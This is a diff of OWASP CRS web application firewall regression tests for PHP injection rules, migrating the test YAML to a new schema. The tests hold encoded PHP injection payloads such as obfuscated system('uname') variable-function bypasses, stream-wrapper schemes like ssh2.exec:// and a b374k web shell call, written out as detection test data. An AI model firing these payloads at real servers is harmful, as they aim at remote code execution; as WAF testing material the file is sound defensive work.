"GET" - port: 80 - uri: "/get?x=%24%24%24z%2829%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%24%24z%2829%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 29 desc: ${_.__}(30); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B_.__%7D%2830%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B_.__%7D%2830%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 30 desc: $ {@_.__}(31); stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 31 desc: $_[@-_]($_[@!+_] ) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 32 desc: $f(101).$f(120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24f%28101%29.%24f%28120%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24f%28101%29.%24f%28120%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 33 desc: '@$b374k("foo")' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%40%24b374k%28%22foo%22%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%40%24b374k%28%22foo%22%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 34 desc: ${$foo->bar}(200) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 35 desc: $foo->$funcname() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: '%24foo-%3E%24funcname%28%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: '%24foo-%3E%24funcname%28%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 36 desc: Foo::$variable() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=Foo%3A%3A%24variable%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933180" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=Foo%3A%3A%24variable%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 32e1408fa..ba6621baf 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -1,25 +1,23 @@ --- meta: author: "NiceYouKnow, azurit" - description: None - enabled: true - name: 933190.yaml +rule_id: 933190 tests: - - test_title: 933190-1 + - test_id: 1 desc: "PHP Injection Attack: PHP Closing Tag Found" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 'file_test=&submit=1' - version: HTTP/1.1 - output: - log_contains: id "933190" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: 'file_test=&submit=1' + version: HTTP/1.1 + output: + log: + expect_ids: [933190] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index aff09caf0..83a1a3e77 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml @@ -1,167 +1,165 @@ --- meta: author: "NiceYouKnow, azurit" - description: None - enabled: true - name: 933200.yaml +rule_id: 9331200 tests: - - test_title: 933200-1 + - test_id: 1 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 2 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.bzip2://file.bz2" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.bzip2://file.bz2" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 3 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 4 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=zip://archive.zip" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=zip://archive.zip" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 5 desc: "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=lz77://some_file.lz" - version: HTTP/1.1 - output: - no_log_contains: id "933200" - - test_title: 933200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=lz77://some_file.lz" + version: HTTP/1.1 + output: + log: + no_expect_ids: [933200] + - test_id: 6 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 7 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 8 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 9 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" - - test_title: 933200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] + - test_id: 10 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" - version: HTTP/1.1 - output: - log_contains: id "933200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" + version: HTTP/1.1 + output: + log: + expect_ids: [933200] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml index 49c79d906..74a7285e7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml @@ -2,344 +2,343 @@ meta: author: "theMiddle, azurit" description: Test for "933210" PHP Variable Function bypass - enabled: true - name: 933210.yaml +rule_id: 933210 tests: - - test_title: 933210-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933210] + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933210] + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 